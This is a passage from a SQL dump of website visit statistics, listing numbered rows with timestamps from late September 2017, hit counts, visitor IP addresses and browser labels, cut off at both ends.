0,0,'54.165.59.7','other'),(160858,1506526478,1,1,0,0,'217.182.132.28','other'),(160859,1506526486,1,1,0,0,'217.182.132.23','other'),(160860,1506527040,1,1,0,0,'217.182.132.36','other'),(160861,1506527365,1,1,0,0,'5.45.207.64','other'),(160862,1506527386,1,1,0,0,'91.209.11.236','other'),(160863,1506527477,2,2,0,0,'207.46.13.90','other'),(160864,1506527726,1,1,0,0,'178.154.171.75','other'),(160865,1506527918,1,1,0,0,'178.94.172.234','chrome'),(160866,1506528491,1,1,0,0,'185.137.17.4','chrome'),(160867,1506528840,1,1,0,0,'137.74.207.159','other'),(160868,1506528937,1,1,0,0,'8.29.198.26','other'),(160869,1506529039,1,1,0,0,'91.209.11.236','other'),(160870,1506529075,1,0,1,0,'66.249.70.25',''),(160871,1506529473,1,1,0,0,'164.132.162.154','other'),(160872,1506529723,1,1,0,0,'91.196.178.72','firefox'),(160873,1506529835,1,1,0,0,'91.196.178.163','chrome'),(160874,1506530095,1,1,0,0,'51.255.65.67','other'),(160875,1506530700,1,1,0,0,'91.196.178.35','chrome'),(160876,1506531070,1,1,0,0,'217.182.132.66','other'),(160877,1506531177,1,1,0,0,'5.45.207.64','other'),(160878,1506532006,1,1,0,0,'217.182.132.58','other'),(160879,1506532162,1,1,0,0,'164.132.162.158','other'),(160880,1506532442,1,1,0,0,'66.249.64.28','chrome'),(160881,1506532506,1,1,0,0,'51.255.71.118','other'),(160882,1506532515,1,1,0,0,'51.255.65.19','other'),(160883,1506532578,1,1,0,0,'5.45.207.9','other'),(160884,1506533289,1,1,0,0,'51.255.65.66','other'),(160885,1506533709,1,1,0,0,'54.165.59.7','other'),(160886,1506534275,1,0,1,0,'68.180.230.153',''),(160887,1506534337,2,2,0,0,'91.209.11.236','other'),(160888,1506534432,1,1,0,0,'164.132.162.188','other'),(160889,1506534819,1,1,0,0,'217.182.132.59','other'),(160890,1506535535,1,1,0,0,'217.182.132.14','other'),(160891,1506535559,1,1,0,0,'217.182.132.154','other'),(160892,1506535729,1,0,1,0,'66.249.64.30',''),(160893,1506535741,1,1,0,0,'95.220.206.88','chrome'),(160894,1506536106,1,1,0,0,'51.255.65.48','other'),(160895,1506536828,1,1,0,0,'51.255.65.224','other'),(160896,1506537432,1,1,0,0,'51.255.65.23','other'),(160897,1506538650,1,1,0,0,'51.255.65.35','other'),(160898,1506538808,1,1,0,0,'217.182.132.191','other'),(160899,1506538817,1,1,0,0,'217.182.132.36','other'),(160900,1506538962,1,1,0,0,'217.182.132.178','other'),(160901,1506539161,1,1,0,0,'164.132.162.157','other'),(160902,1506539173,1,1,0,0,'51.255.65.45','other'),(160903,1506539602,1,1,0,0,'51.255.65.68','other'),(160904,1506539782,1,1,0,0,'8.29.198.26','other'),(160905,1506539922,1,1,0,0,'137.74.207.164','other'),(160906,1506540122,1,1,0,0,'51.255.65.57','other'),(160907,1506540536,2,2,0,0,'83.24.172.192','other'),(160908,1506541352,1,1,0,0,'217.182.132.188','other'),(160909,1506541427,1,1,0,0,'5.45.207.64','other'),(160910,1506541692,1,0,1,0,'66.249.70.25',''),(160911,1506541756,1,1,0,0,'217.182.132.150','other'),(160912,1506541922,1,1,0,0,'51.255.65.83','other'),(160913,1506542011,1,1,0,0,'217.182.132.67','other'),(160914,1506542696,1,0,1,0,'66.249.70.25',''),(160915,1506542764,1,1,0,0,'164.132.162.158','other'),(160916,1506542993,1,1,0,0,'51.255.65.19','other'),(160917,1506543390,1,1,0,0,'5.45.207.9','other'),(160918,1506543508,1,1,0,0,'91.121.83.118','chrome'),(160919,1506543986,1,1,0,0,'5.45.207.64','other'),(160920,1506543997,1,1,0,0,'51.255.65.76','other'),(160921,1506544475,1,1,0,0,'51.255.65.64','other'),(160922,1506544718,1,1,0,0,'199.58.86.211','other'),(160923,1506545209,1,1,0,0,'91.209.11.236','other'),(160924,1506545288,1,1,0,0,'217.182.132.74','other'),(160925,1506545293,1,0,1,0,'66.249.70.29',''),(160926,1506545663,1,1,0,0,'180.76.15.25','other'),(160927,1506546987,1,0,1,0,'66.249.70.29',''),(160928,1506547165,1,1,0,0,'51.255.71.98','other'),(160929,1506547320,1,1,0,0,'66.249.64.29','chrome'),(160930,1506547671,1,1,0,0,'51.255.71.132','other'),(160931,1506548431,2,2,0,0,'217.182.132.148','other'),(160932,1506548905,1,1,0,0,'51.255.65.46','other'),(160933,1506549473,1,1,0,0,'51.255.65.41','other'),(160934,1506549667,1,1,0,0,'91.209.11.236','other'),(160935,1506550076,1,1,0,0,'137.74.207.102','other'),(160936,1506550228,1,1,0,0,'51.255.65.68','other'),(160937,1506550613,1,1,0,0,'8.29.198.26','other'),(160938,1506550628,1,1,0,0,'51.255.65.36','other'),(160939,1506550744,1,1,0,0,'217.182.132.81','other'),(160940,1506550764,1,1,0,0,'51.255.65.61','other'),(160941,1506550908,1,1,0,0,'217.182.132.155','other'),(160942,1506550930,1,1,0,0,'178.154.171.75','other'),(160943,1506551131,1,1,0,0,'95.28.201.15','msie'),(160944,1506551220,1,1,0,0,'217.182.132.21','other'),(160945,1506552443,1,1,0,0,'217.182.132.57','other'),(160946,1506552564,1,1,0,0,'180.76.15.21','other'),(160947,1506553267,1,0,1,0,'68.180.229.52',''),(160948,1506553302,1,1,0,0,'91.209.11.236','other'),(160949,1506553446,1,1,0,0,'51.255.65.79','other'),(160950,1506553559,1,1,0,0,'5.45.207.64','other'),(160951,1506554000,1,1,0,0,'217.182.132.152','other'),(160952,1506554036,1,1,0,0,'178.154.171.75','other'),(160953,1506554398,1,1,0,0,'51.255.65.64','other'),(160954,1506554683,2,2,0,0,'91.209.11.236','other'),(160955,1506555474,1,1,0,0,'51.255.65.21','other'),(160956,1506555941,1,1,0,0,'217.182.132.178','other'),(160957,1506556275,1,1,0,0,'51.255.65.52','other'),(160958,1506556880,1,0,1,0,'66.249.70.29',''),(160959,1506556890,1,1,0,0,'91.209.11.236','other'),(160960,1506557136,1,1,0,0,'5.45.207.64','other'),(160961,1506557185,1,1,0,0,'216.244.66.237','other'),(160962,1506557449,1,0,1,0,'66.249.64.29',''),(160963,1506557826,1,1,0,0,'164.132.162.164','other'),(160964,1506558165,1,1,0,0,'91.209.11.236','other'),(160965,1506558575,1,1,0,0,'164.132.162.188','other'),(160966,1506558762,1,1,0,0,'5.45.207.9','other'),(160967,1506559892,1,1,0,0,'207.46.13.75','other'),(160968,1506560420,1,1,0,0,'51.255.65.74','other'),(160969,1506560568,1,1,0,0,'51.255.65.65','other'),(160970,1506560802,1,1,0,0,'51.255.65.88','other'),(160971,1506561096,1,1,0,0,'5.45.207.64','other'),(160972,1506561454,1,1,0,0,'8.29.198.25','other'),(160973,1506561506,1,1,0,0,'164.132.162.154','other'),(160974,1506561613,1,1,0,0,'217.182.132.93','other'),(160975,1506561900,1,1,0,0,'51.255.65.15','other'),(160976,1506561918,1,1,0,0,'217.182.132.69','other'),(160977,1506561950,1,1,0,0,'51.255.65.33','other'),(160978,1506562116,1,0,1,0,'66.249.64.29',''),(160979,1506562316,1,1,0,0,'151.80.27.116','other'),(160980,1506562493,1,1,0,0,'51.255.65.63','other'),(160981,1506562704,1,1,0,0,'217.69.133.9','other'),(160982,1506564076,1,1,0,0,'51.255.65.2','other'),(160983,1506564225,1,1,0,0,'151.80.27.118','other'),(160984,1506564287,1,1,0,0,'137.74.207.164','other'),(160985,1506565405,1,1,0,0,'51.255.71.119','other'),(160986,1506565594,1,1,0,0,'91.209.11.236','other'),(160987,1506565629,1,1,0,0,'217.182.132.155','other'),(160988,1506565820,1,1,0,0,'141.8.142.53','other'),(160989,1506566215,1,1,0,0,'217.182.132.58','other'),(160990,1506566407,1,1,0,0,'66.249.64.30','chrome'),(160991,1506567366,1,1,0,0,'51.255.71.98','other'),(160992,1506567495,2,2,0,0,'88.198.23.179','other'),(160993,1506567673,1,0,1,0,'66.249.64.28',''),(160994,1506567678,2,2,0,0,'66.249.64.29','chrome'),(160995,1506567925,1,0,1,0,'66.249.70.27',''),(160996,1506568223,3,0,3,0,'66.249.64.30',''),(160997,1506568691,1,1,0,0,'137.74.207.159','other'),(160998,1506568694,1,1,0,0,'51.255.71.128','other'),(160999,1506568928,1,1,0,0,'217.182.132.73','other'),(161000,1506569037,1,1,0,0,'217.182.132.176','other'),(161001,1506569048,1,1,0,0,'51.255.71.116','other'),(161002,1506569160,1,0,1,0,'66.249.64.29',''),(161003,1506569207,1,1,0,0,'207.46.13.38','other'),(161004,1506569235,1,0,1,0,'66.249.64.30',''),(161005,1506569608,2,0,2,0,'66.249.70.25',''),(161006,1506569662,1,1,0,0,'217.182.132.80','other'),(161007,1506570291,1,1,0,0,'217.182.132.14','other'),(161008,1506570305,1,1,0,0,'164.132.162.164','other'),(161009,1506570611,1,1,0,0,'178.154.171.75','other'),(161010,1506570844,1,1,0,0,'51.255.65.54','other'),(161011,1506571862,1,1,0,0,'51.255.65.6','other'),(161012,1506571869,1,1,0,0,'217.182.132.52','other'),(161013,1506571977,1,1,0,0,'107.167.107.165','opera'),(161014,1506572196,1,1,0,0,'51.255.71.122','other'),(161015,1506572293,1,1,0,0,'8.29.198.27','other'),(161016,1506572945,1,1,0,0,'91.196.177.46','firefox'),(161017,1506573032,1,0,1,0,'66.249.70.25',''),(161018,1506573040,1,0,1,0,'66.249.64.29',''),(161019,1506573235,1,0,1,0,'66.249.70.29',''),(161020,1506573986,1,1,0,0,'91.196.177.46','firefox'),(161021,1506574129,1,1,0,0,'66.249.64.30','chrome'),(161022,1506574307,1,0,1,0,'66.249.70.29',''),(161023,1506575573,1,1,0,0,'51.255.65.16','other'),(161024,1506575645,1,1,0,0,'51.255.65.18','other'),(161025,1506575660,1,1,0,0,'51.255.65.82','other'),(161026,1506575687,1,1,0,0,'137.74.207.108','other'),(161027,1506575705,1,1,0,0,'180.76.15.151','other'),(161028,1506575772,1,1,0,0,'51.255.65.81','other'),(161029,1506575777,2,2,0,0,'144.76.6.230','other'),(161030,1506575855,1,1,0,0,'51.255.65.7','other'),(161031,1506576116,1,1,0,0,'87.250.224.110','other'),(161032,1506576728,1,1,0,0,'217.182.132.93','other'),(161033,1506577198,1,1,0,0,'217.182.132.90','other'),(161034,1506577223,1,1,0,0,'217.182.132.87','other'),(161035,1506577321,1,1,0,0,'51.255.65.60','other'),(161036,1506577512,1,1,0,0,'188.163.16.6','chrome'),(161037,1506577538,1,1,0,0,'95.132.79.5','chrome'),(161038,1506577686,1,1,0,0,'51.255.65.52','other'),(161039,1506577862,1,0,1,0,'66.249.64.30',''),(161040,1506577992,1,1,0,0,'217.182.132.29','other'),(161041,1506578268,1,1,0,0,'217.182.132.86','other'),(161042,1506578277,1,1,0,0,'217.182.132.90','other'),(161043,1506578297,1,1,0,0,'37.9.113.119','other'),(161044,1506578336,1,0,1,0,'66.249.64.29',''),(161045,1506578625,1,1,0,0,'216.244.66.237','other'),(161046,1506578786,1,1,0,0,'51.255.65.21','other'),(161047,1506578815,1,1,0,0,'51.255.65.92','other'),(161048,1506578839,1,1,0,0,'217.182.132.170','other'),(161049,1506578864,1,1,0,0,'66.102.9.25','chrome'),(161050,1506579367,1,1,0,0,'66.249.64.30','chrome'),(161051,1506579705,1,1,0,0,'180.76.15.148','other'),(161052,1506579944,1,1,0,0,'217.182.132.87','other'),(161053,1506579954,1,1,0,0,'51.255.65.32','other'),(161054,1506580291,1,1,0,0,'62.210.201.93','chrome'),(161055,1506580292,1,1,0,0,'141.8.142.81','other'),(161056,1506580342,1,1,0,0,'188.166.68.105','chrome'),(161057,1506581010,1,1,0,0,'51.255.65.96','other'),(161058,1506581223,1,1,0,0,'51.255.65.80','other'),(161059,1506581573,1,1,0,0,'51.255.65.27','other'),(161060,1506581603,1,1,0,0,'217.182.132.62','other'),(161061,1506581628,1,1,0,0,'91.209.11.236','other'),(161062,1506581925,1,1,0,0,'217.182.132.153','other'),(161063,1506581944,1,1,0,0,'91.124.238.254','chrome'),(161064,1506582007,1,1,0,0,'217.182.132.52','other'),(161065,1506582397,1,1,0,0,'217.182.132.95','other'),(161066,1506582408,1,1,0,0,'91.213.59.94','chrome'),(161067,1506582553,1,1,0,0,'5.45.207.64','other'),(161068,1506582647,7,7,0,0,'88.99.19.242','other'),(161069,1506582827,1,1,0,0,'130.180.210.139','firefox'),(161070,1506583045,1,1,0,0,'217.182.132.90','other'),(161071,1506583137,1,1,0,0,'8.29.198.25','other'),(161072,1506583377,1,1,0,0,'91.196.177.46','firefox'),(161073,1506583464,1,1,0,0,'217.182.132.37','other'),(161074,1506583520,1,1,0,0,'217.182.132.86','other'),(161075,1506583535,1,1,0,0,'91.196.178.166','chrome'),(161076,1506583551,1,1,0,0,'207.46.13.90','other'),(161077,1506583585,1,1,0,0,'66.249.64.28','chrome'),(161078,1506583697,1,1,0,0,'217.182.132.77','other'),(161079,1506583850,1,1,0,0,'217.182.132.22','other'),(161080,1506583982,1,1,0,0,'91.209.11.236','other'),(161081,1506583998,1,1,0,0,'91.196.178.68','chrome'),(161082,1506584424,1,1,0,0,'91.196.178.33','chrome'),(161083,1506584834,1,1,0,0,'176.105.202.40','chrome'),(161084,1506585357,1,1,0,0,'66.249.64.29','chrome'),(161085,1506585429,1,1,0,0,'134.249.147.14','chrome'),(161086,1506585729,1,0,1,0,'68.180.229.52',''),(161087,1506586067,1,1,0,0,'91.196.178.68','chrome'),(161088,1506586177,1,0,1,0,'66.249.70.29',''),(161089,1506586909,1,0,1,0,'68.180.229.52',''),(161090,1506587803,1,1,0,0,'91.196.177.46','firefox'),(161091,1506588258,1,1,0,0,'91.196.178.69','chrome'),(161092,1506588416,1,1,0,0,'66.249.70.29','chrome'),(161093,1506588661,1,0,1,0,'66.249.70.27',''),(161094,1506588979,1,1,0,0,'94.179.37.254','chrome'),(161095,1506589166,1,1,0,0,'91.196.179.134','chrome'),(161096,1506589886,1,1,0,0,'93.73.177.119','firefox'),(161097,1506591030,1,1,0,0,'91.209.11.236','other'),(161098,1506592615,1,1,0,0,'91.196.177.15','chrome'),(161099,1506593970,1,1,0,0,'8.29.198.26','other'),(161100,1506594119,1,1,0,0,'5.45.207.64','other'),(161101,1506595204,1,1,0,0,'212.115.235.84','chrome'),(161102,1506595379,1,1,0,0,'216.244.66.237','other'),(161103,1506595825,1,0,1,0,'68.180.229.52',''),(161104,1506597652,1,1,0,0,'141.8.142.74','other'),(161105,1506597821,1,1,0,0,'95.132.49.1','firefox'),(161106,1506599240,1,1,0,0,'217.182.132.19','other'),(161107,1506599243,1,1,0,0,'217.182.132.183','other'),(161108,1506599445,1,1,0,0,'51.255.65.55','other'),(161109,1506599476,1,1,0,0,'66.249.70.29','chrome'),(161110,1506599544,1,1,0,0,'178.94.172.28','firefox'),(161111,1506599600,1,1,0,0,'217.182.132.75','other'),(161112,1506599652,2,2,0,0,'5.45.207.64','other'),(161113,1506600308,1,1,0,0,'164.132.162.187','other'),(161114,1506600408,1,1,0,0,'151.80.27.116','other'),(161115,1506600411,1,1,0,0,'51.255.71.114','other'),(161116,1506600499,1,1,0,0,'217.182.132.21','other'),(161117,1506600625,1,1,0,0,'51.255.65.86','other'),(161118,1506600665,1,1,0,0,'134.249.147.14','chrome'),(161119,1506600925,1,1,0,0,'217.182.132.35','other'),(161120,1506601029,1,1,0,0,'164.132.162.157','other'),(161121,1506601111,1,0,1,0,'66.249.64.29',''),(161122,1506601451,1,1,0,0,'137.74.207.110','other'),(161123,1506601559,1,1,0,0,'108.59.8.80','other'),(161124,1506601728,1,1,0,0,'216.244.66.237','other'),(161125,1506601795,1,1,0,0,'51.255.65.72','other'),(161126,1506601866,1,1,0,0,'217.182.132.241','other'),(161127,1506602051,1,1,0,0,'217.182.132.90','other'),(161128,1506602235,1,1,0,0,'217.182.132.25','other'),(161129,1506602305,1,1,0,0,'217.182.132.176','other'),(161130,1506602415,1,1,0,0,'51.255.71.129','other'),(161131,1506602442,1,1,0,0,'5.45.207.9','other'),(161132,1506602474,1,1,0,0,'217.182.132.54','other'),(161133,1506602541,1,1,0,0,'217.182.132.16','other'),(161134,1506602606,1,1,0,0,'217.182.132.150','other'),(161135,1506602741,1,1,0,0,'51.255.65.51','other'),(161136,1506602780,1,1,0,0,'51.255.65.39','other'),(161137,1506603519,1,1,0,0,'207.46.13.92','other'),(161138,1506603529,2,2,0,0,'178.94.2.154','chrome'),(161139,1506603559,1,1,0,0,'217.182.132.176','other'),(161140,1506603756,1,1,0,0,'217.182.132.75','other'),(161141,1506603821,1,1,0,0,'51.255.65.42','other'),(161142,1506603871,1,1,0,0,'51.255.65.73','other'),(161143,1506604195,1,1,0,0,'217.182.132.80','other'),(161144,1506604310,1,1,0,0,'216.244.66.237','other'),(161145,1506604335,1,1,0,0,'51.255.65.224','other'),(161146,1506604465,1,0,1,0,'66.249.64.28',''),(161147,1506604796,1,1,0,0,'8.29.198.25','other'),(161148,1506605065,1,0,1,0,'66.249.70.27',''),(161149,1506605192,1,1,0,0,'66.249.70.25','chrome'),(161150,1506605206,1,1,0,0,'217.182.132.74','other'),(161151,1506605353,1,1,0,0,'137.74.207.188','other'),(161152,1506605396,1,0,1,0,'68.180.229.52',''),(161153,1506605399,1,1,0,0,'217.182.132.181','other'),(161154,1506605687,1,0,1,0,'66.249.64.30',''),(161155,1506605701,1,1,0,0,'51.255.65.66','other'),(161156,1506605932,1,1,0,0,'66.249.70.29','chrome'),(161157,1506606086,1,1,0,0,'217.182.132.56','other'),(161158,1506606190,1,1,0,0,'164.132.162.158','other'),(161159,1506606377,1,1,0,0,'217.182.132.66','other'),(161160,1506606460,1,1,0,0,'137.74.201.100','other'),(161161,1506606482,1,1,0,0,'51.255.65.39','other'),(161162,1506606588,1,1,0,0,'217.69.133.3','other'),(161163,1506606736,1,1,0,0,'31.134.125.91','firefox'),(161164,1506606898,1,1,0,0,'217.182.132.55','other'),(161165,1506606929,1,0,1,0,'66.249.64.28',''),(161166,1506607087,1,1,0,0,'141.8.142.90','other'),(161167,1506607674,1,1,0,0,'51.255.65.68','other'),(161168,1506607905,1,1,0,0,'217.182.132.58','other'),(161169,1506608085,1,1,0,0,'178.154.171.28','other'),(161170,1506608100,2,2,0,0,'91.196.178.69','firefox'),(161171,1506608160,1,1,0,0,'51.255.65.41','other'),(161172,1506608322,1,1,0,0,'217.182.132.97','other'),(161173,1506608385,1,1,0,0,'137.74.207.120','other'),(161174,1506608425,1,1,0,0,'217.182.132.149','other'),(161175,1506608501,1,1,0,0,'217.182.132.182','other'),(161176,1506608627,1,1,0,0,'217.182.132.90','other'),(161177,1506608847,1,1,0,0,'51.255.65.84','other'),(161178,1506608879,1,1,0,0,'137.74.207.116','other'),(161179,1506608881,1,1,0,0,'37.9.113.54','other'),(161180,1506608914,2,0,2,0,'66.249.64.28',''),(161181,1506609136,1,0,1,0,'66.249.64.29',''),(161182,1506609377,1,1,0,0,'217.182.132.62','other'),(161183,1506609635,1,1,0,0,'95.67.111.22','chrome'),(161184,1506609684,1,1,0,0,'51.255.65.6','other'),(161185,1506609698,1,1,0,0,'216.244.66.237','other'),(161186,1506610215,1,1,0,0,'217.182.132.52','other'),(161187,1506610536,1,1,0,0,'157.55.39.79','other'),(161188,1506610696,1,1,0,0,'51.255.65.71','other'),(161189,1506610752,1,1,0,0,'217.182.132.17','other'),(161190,1506610845,1,1,0,0,'137.74.207.109','other'),(161191,1506610988,2,2,0,0,'91.209.11.236','other'),(161192,1506611238,1,1,0,0,'51.255.65.63','other'),(161193,1506611501,1,0,1,0,'66.249.64.29',''),(161194,1506611558,1,1,0,0,'51.255.71.117','other'),(161195,1506611590,1,0,1,0,'66.249.64.28',''),(161196,1506612134,1,1,0,0,'51.255.65.58','other'),(161197,1506612658,1,0,1,0,'66.249.70.25',''),(161198,1506612692,1,1,0,0,'91.196.178.129','chrome'),(161199,1506612872,2,2,0,0,'51.255.65.30','other'),(161200,1506612887,1,1,0,0,'91.196.177.46','firefox'),(161201,1506613007,1,1,0,0,'217.182.132.150','other'),(161202,1506613049,2,2,0,0,'91.209.11.236','other'),(161203,1506613541,1,1,0,0,'51.255.71.115','other'),(161204,1506613708,1,1,0,0,'217.182.132.64','other'),(161205,1506613780,1,1,0,0,'51.255.65.69','other'),(161206,1506613816,1,0,1,0,'66.249.70.25',''),(161207,1506613835,1,1,0,0,'66.249.70.27','chrome'),(161208,1506613956,1,1,0,0,'217.182.132.92','other'),(161209,1506614231,1,1,0,0,'217.182.132.20','other'),(161210,1506614317,1,1,0,0,'217.182.132.241','other'),(161211,1506614562,1,1,0,0,'51.255.65.64','other'),(161212,1506614764,1,0,1,0,'66.249.64.30',''),(161213,1506614781,1,1,0,0,'217.182.132.191','other'),(161214,1506614857,1,1,0,0,'173.212.254.198','other'),(161215,1506614916,1,1,0,0,'51.255.65.24','other'),(161216,1506614945,1,1,0,0,'164.132.162.155','other'),(161217,1506614981,1,1,0,0,'51.255.71.116','other'),(161218,1506614994,1,1,0,0,'217.69.133.194','other'),(161219,1506615049,1,0,1,0,'66.249.64.29',''),(161220,1506615087,1,1,0,0,'51.255.65.80','other'),(161221,1506615118,1,1,0,0,'217.182.132.184','other'),(161222,1506615258,1,1,0,0,'51.255.65.37','other'),(161223,1506615356,1,1,0,0,'217.182.132.90','other'),(161224,1506615601,1,1,0,0,'217.182.132.93','other'),(161225,1506615624,1,1,0,0,'8.29.198.25','other'),(161226,1506615866,1,1,0,0,'91.196.178.166','chrome'),(161227,1506616099,1,0,1,0,'66.249.64.30',''),(161228,1506616175,1,0,1,0,'66.249.64.28',''),(161229,1506616189,1,1,0,0,'217.182.132.58','other'),(161230,1506616314,1,1,0,0,'51.255.71.115','other'),(161231,1506616405,1,1,0,0,'51.255.65.16','other'),(161232,1506616470,1,1,0,0,'217.182.132.84','other'),(161233,1506616475,1,1,0,0,'217.182.132.149','other'),(161234,1506616725,1,1,0,0,'51.255.65.9','other'),(161235,1506616958,1,1,0,0,'217.182.132.24','other'),(161236,1506616963,1,1,0,0,'207.46.13.92','other'),(161237,1506617488,1,0,1,0,'68.180.229.52',''),(161238,1506617523,1,1,0,0,'217.182.132.84','other'),(161239,1506617527,2,2,0,0,'54.165.59.7','other'),(161240,1506617652,1,1,0,0,'91.196.178.69','firefox'),(161241,1506617663,1,1,0,0,'137.74.207.164','other'),(161242,1506617785,1,1,0,0,'217.182.132.6','other'),(161243,1506617910,1,0,1,0,'66.249.64.29',''),(161244,1506617942,1,1,0,0,'95.220.88.185','chrome'),(161245,1506618493,1,1,0,0,'51.255.71.130','other'),(161246,1506618553,1,1,0,0,'51.255.65.56','other'),(161247,1506618671,1,1,0,0,'157.55.39.79','other'),(161248,1506618673,1,1,0,0,'54.165.59.7','other'),(161249,1506618804,1,1,0,0,'51.255.65.31','other'),(161250,1506618812,1,1,0,0,'51.255.65.37','other'),(161251,1506618888,1,1,0,0,'51.255.71.122','other'),(161252,1506618947,1,1,0,0,'217.182.132.183','other'),(161253,1506619066,1,1,0,0,'51.255.65.5','other'),(161254,1506619104,1,1,0,0,'217.182.132.147','other'),(161255,1506619131,1,1,0,0,'51.255.65.51','other'),(161256,1506619350,1,0,1,0,'68.180.230.153',''),(161257,1506619417,1,1,0,0,'217.182.132.191','other'),(161258,1506619476,1,1,0,0,'51.255.71.116','other'),(161259,1506619503,1,1,0,0,'217.182.132.21','other'),(161260,1506619524,1,1,0,0,'51.255.65.36','other'),(161261,1506619525,1,1,0,0,'51.255.65.52','other'),(161262,1506620175,1,1,0,0,'217.182.132.50','other'),(161263,1506620217,1,1,0,0,'217.182.132.17','other'),(161264,1506620305,1,1,0,0,'51.255.65.46','other'),(161265,1506620549,1,1,0,0,'217.182.132.59','other'),(161266,1506620608,1,1,0,0,'137.74.207.101','other'),(161267,1506620712,1,1,0,0,'137.74.207.170','other'),(161268,1506620814,1,1,0,0,'51.255.65.81','other'),(161269,1506620881,1,1,0,0,'137.74.201.100','other'),(161270,1506621387,1,0,1,0,'66.249.70.27',''),(161271,1506621518,1,1,0,0,'217.182.132.71','other'),(161272,1506621657,1,1,0,0,'137.74.207.170','other'),(161273,1506621664,1,1,0,0,'51.255.65.83','other'),(161274,1506621695,1,1,0,0,'51.255.65.29','other'),(161275,1506621736,1,1,0,0,'51.255.65.65','other'),(161276,1506621903,1,1,0,0,'217.182.132.55','other'),(161277,1506621906,1,1,0,0,'51.255.65.3','other'),(161278,1506622132,2,0,2,0,'66.249.64.29',''),(161279,1506622220,1,1,0,0,'217.182.132.51','other'),(161280,1506622541,1,1,0,0,'217.182.132.86','other'),(161281,1506622611,1,1,0,0,'217.182.132.62','other'),(161282,1506622738,1,0,1,0,'66.249.64.28',''),(161283,1506622789,1,1,0,0,'180.76.15.140','other'),(161284,1506623046,1,1,0,0,'51.255.65.65','other'),(161285,1506623071,1,1,0,0,'137.74.207.188','other'),(161286,1506623189,1,0,1,0,'66.249.64.29',''),(161287,1506623287,1,1,0,0,'137.74.207.102','other'),(161288,1506623366,1,1,0,0,'217.182.132.36','other'),(161289,1506623560,1,1,0,0,'51.255.65.46','other'),(161290,1506623672,1,1,0,0,'217.182.132.65','other'),(161291,1506624530,1,1,0,0,'51.255.71.129','other'),(161292,1506624995,1,1,0,0,'137.74.207.119','other'),(161293,1506625088,1,0,1,0,'66.249.64.29',''),(161294,1506625133,1,0,1,0,'68.180.229.52',''),(161295,1506625415,1,1,0,0,'217.182.132.84','other'),(161296,1506626040,1,1,0,0,'217.182.132.156','other'),(161297,1506626306,1,1,0,0,'51.255.71.113','other'),(161298,1506626382,1,1,0,0,'217.182.132.36','other'),(161299,1506626435,1,1,0,0,'217.182.132.174','other'),(161300,1506626459,1,1,0,0,'8.29.198.25','other'),(161301,1506626473,1,1,0,0,'51.255.65.86','other'),(161302,1506626883,1,1,0,0,'51.255.65.29','other'),(161303,1506626951,1,1,0,0,'51.255.65.46','other'),(161304,1506627000,1,1,0,0,'217.182.132.73','other'),(161305,1506627006,1,1,0,0,'217.182.132.4','other'),(161306,1506627038,1,1,0,0,'51.255.71.101','other'),(161307,1506627259,1,1,0,0,'217.182.132.70','other'),(161308,1506627455,1,1,0,0,'217.182.132.14','other'),(161309,1506627471,1,1,0,0,'164.132.162.156','other'),(161310,1506627620,1,1,0,0,'51.255.65.81','other'),(161311,1506628172,1,1,0,0,'91.196.178.133','chrome'),(161312,1506628657,1,1,0,0,'87.250.224.118','other'),(161313,1506628782,1,0,1,0,'66.249.70.27',''),(161314,1506628896,1,1,0,0,'91.209.11.236','other'),(161315,1506629167,1,1,0,0,'217.182.132.149','other'),(161316,1506629217,2,2,0,0,'157.55.39.176','other'),(161317,1506629630,1,1,0,0,'217.182.132.4','other'),(161318,1506630146,1,1,0,0,'51.255.65.87','other'),(161319,1506630252,1,1,0,0,'5.248.138.90','chrome'),(161320,1506630462,1,0,1,0,'66.249.70.27',''),(161321,1506630491,1,1,0,0,'217.182.132.156','other'),(161322,1506630713,1,1,0,0,'91.209.11.236','other'),(161323,1506630801,1,0,1,0,'66.249.64.29',''),(161324,1506630876,1,1,0,0,'5.45.207.74','other'),(161325,1506630906,1,1,0,0,'51.255.65.82','other'),(161326,1506630967,1,1,0,0,'51.255.71.132','other'),(161327,1506631167,1,1,0,0,'51.255.71.100','other'),(161328,1506631391,1,1,0,0,'51.255.65.72','other'),(161329,1506631445,1,1,0,0,'217.182.132.52','other'),(161330,1506631572,1,1,0,0,'137.74.207.116','other'),(161331,1506631593,1,1,0,0,'51.255.65.62','other'),(161332,1506631665,1,0,1,0,'66.249.64.28',''),(161333,1506631682,1,1,0,0,'51.255.65.76','other'),(161334,1506631820,1,1,0,0,'51.255.65.69','other'),(161335,1506631910,1,1,0,0,'51.255.65.56','other'),(161336,1506632176,2,2,0,0,'91.209.11.236','other'),(161337,1506633100,1,1,0,0,'51.255.65.88','other'),(161338,1506633284,1,1,0,0,'51.255.65.20','other'),(161339,1506633332,1,1,0,0,'217.182.132.52','other'),(161340,1506633426,1,1,0,0,'51.255.65.89','other'),(161341,1506633492,1,1,0,0,'164.132.162.164','other'),(161342,1506633524,1,1,0,0,'217.182.132.85','other'),(161343,1506633760,1,1,0,0,'164.132.162.188','other'),(161344,1506633789,1,1,0,0,'217.182.132.50','other'),(161345,1506634026,1,1,0,0,'51.255.65.86','other'),(161346,1506634057,1,1,0,0,'217.182.132.191','other'),(161347,1506634127,1,1,0,0,'51.255.65.59','other'),(161348,1506634244,1,1,0,0,'217.182.132.16','other'),(161349,1506634271,1,1,0,0,'51.255.65.60','other'),(161350,1506634541,1,1,0,0,'51.255.65.75','other'),(161351,1506634706,1,1,0,0,'51.255.71.127','other'),(161352,1506634855,1,1,0,0,'51.255.65.80','other'),(161353,1506634971,1,1,0,0,'137.74.207.120','other'),(161354,1506635188,1,1,0,0,'91.209.11.236','other'),(161355,1506635821,1,0,1,0,'66.249.64.28',''),(161356,1506636056,1,1,0,0,'51.255.71.115','other'),(161357,1506636094,1,1,0,0,'151.80.27.116','other'),(161358,1506636129,2,2,0,0,'51.255.65.21','other'),(161359,1506636131,1,1,0,0,'157.55.39.45','other'),(161360,1506636314,1,1,0,0,'51.255.65.4','other'),(161361,1506636518,1,1,0,0,'217.182.132.153','other'),(161362,1506636557,1,1,0,0,'217.182.132.88','other'),(161363,1506636801,1,1,0,0,'51.255.65.51','other'),(161364,1506636852,1,1,0,0,'217.182.132.154','other'),(161365,1506636863,1,1,0,0,'217.182.132.146','other'),(161366,1506636994,1,1,0,0,'217.182.132.60','other'),(161367,1506637150,1,0,1,0,'66.249.70.27',''),(161368,1506637293,1,1,0,0,'8.29.198.26','other'),(161369,1506637348,2,0,2,0,'66.249.64.29',''),(161370,1506637400,1,1,0,0,'51.255.71.98','other'),(161371,1506637837,1,0,1,0,'66.249.64.30',''),(161372,1506637850,1,1,0,0,'217.182